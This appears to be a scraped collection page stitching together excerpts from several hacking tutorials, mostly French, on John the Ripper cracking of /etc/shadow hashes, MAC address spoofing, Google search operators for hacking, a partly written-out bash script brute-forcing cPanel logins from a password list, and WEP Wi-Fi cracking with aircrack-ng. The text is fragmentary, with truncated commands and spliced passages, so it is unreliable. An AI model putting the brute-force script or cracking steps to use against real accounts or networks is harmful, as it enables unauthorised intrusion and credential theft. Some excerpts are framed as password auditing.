background preloader

Tuto

Facebook Twitter

Art du Web : Utilisation de John Ripper le cracker de passwords. John The Ripper a la réputation d’être le perceur de mot de passe le plus souple d’utilisation pour l’audit des mots de passe. Ce post est réalisé pour les qui souhaiterait tester la solidité des mots de passe des utilisateurs avant que les pirates ne le fassent. John peut être configuré pour par le biais d'une tâche cron. Récupération de la dernière version : wget tar xvzf john-1.7.6.tar.gz cd john-1.7.6 Installation du package : cat README cat doc/INSTALL cd src make make clean linux-x86-64 Votre installation terminée, vous devez visualiser les éxecutables : ll .. Tester l'éxecutable principal 'JOHN' : cd .. John utilise les informations login/GECOS des utilisateurs (nom, prenom, login, etc.) en y appliquant les règles de transformations définies dans le fichier john.conf.

Les dictionnaires sont des fichiers texte, contenant un mot (ou expression) par ligne. Copier les hash du /etc/shadow pour les comptes à tester (ici user 'test'): . Exemple: Appuyer sur [Ctrl+z] pour mettre John en pause wget. Comment changer de manière aléatoire une adresse MAC à chaque démarrage sous Ubuntu. Une astuce qui permet de changer de manière aléatoire son adresse MAC à chaque démarrage d’Ubuntu.

comment changer de manière aléatoire une adresse MAC à chaque démarrage sous Ubuntu.

Pour rappel, l’adresse MAC est l’adresse physique de la carte réseau et est unique au monde, contrairement à l’adresse IP. Pour pouvoir changer l’adresse MAC à chaque démarrage, le système va faire appel à un script. Ce script sera placé dans /etc/init.d/. Le script va faire appel au programme macchanger. How to search on Google like elite Hackers - Learn How to Hack - Best Online Ethical Hacking Website. Google is best search engine in the world.

How to search on Google like elite Hackers - Learn How to Hack - Best Online Ethical Hacking Website

Actually people think that Google's popularity is because of its simple and fast searching interface but friends, its more popular because it has rich operators and query support that will make your searching experience even better. Most of us doesn't know which operators are supported by Google and if they know some of them, they doesn't know how actually these operators work and enrich our searching practice. Today, i will tell you How we can search on Google like elite hackers or simply say computer experts do. But for this its necessary that you should know and understand all the Google operators properly. So lets learn how we can enrich our searching experience in Google. Google operators: Google operators are classified into two basic categories:1. Basic Google Operators:- Advanced Operators:- 1) Intitle :- This operator searches within the title tags. intitle:"index of" returns all pages that have string "index of" in their title.

SecureDeath[d0t]com: how to build your own BruteForce tool using linux shell script. Hello, did you ever try to brute force a website login page and you didn't find the right tool?

SecureDeath[d0t]com: how to build your own BruteForce tool using linux shell script

It always happen, so i will explain how i did it with linux shell script. I wrote a small script to brute force Cpanel accounts:============================================#! /usr/bin/env bash# Cpanel BruteForce v1.0# Coded By Dr.Death 2008# drdeath[at]bsdmail.org## This is a simple script that will brute force Cpanel account ## I do not take any reponsibilty for what you do with this tool# Hopefully it will make your life easier rather then making other# peoples lives more difficult! ############################# #############################echo ". n=`cat pass_list | wc -l`for (( i=1; i <= $n; i++));do password=`sed -n "$i"p pass_list` b=`lynx -dump -nolist -auth="$password" ""$site":2082"` echo trying password $password if [ !

Lets explain what we did: #! So password file pass_list should include the usernames and passwords in this format: "username:password" if [ ! Thats all falks :)Dr.Death. Cracker un réseau Wifi sous GNU/Linux. Les réseaux Wifi envahissent notre quotidien. Force est de constater les techniques de protection de ces réseaux ont fait un bon en avant ces dernières années: WEP, WPA, WPA2... Cependant, il existe des solutions logicielles pour contourner ces protections. Nous allons en aborder quelques unes dans ce billet. Attention: Je décline toute responsabilité concernant l'usage de ce tutoriel par des personnes mal intentionnées.

Je vous rappelle qu'il est formellement interdit de s'introduire sur un réseau sans l'accord de son propriétaire. Le principe est de capturer du trafic Wifi puis d'analyser le contenu de la capture pour y trouver le mot de passe WEP. Installation de Aircrack-NG Sur une distribution GNU/Linux Ubuntu, l'installation se résume à la ligne de commande suivante: sudo aptitude install aircrack-ng Capture du trafic Wifi On commence par activer le "monitoring" sur l'interface Wifi (wlan0) dans mon cas: Cette commandes va afficher les réseau Wifi disponibles: Analyse du dump ...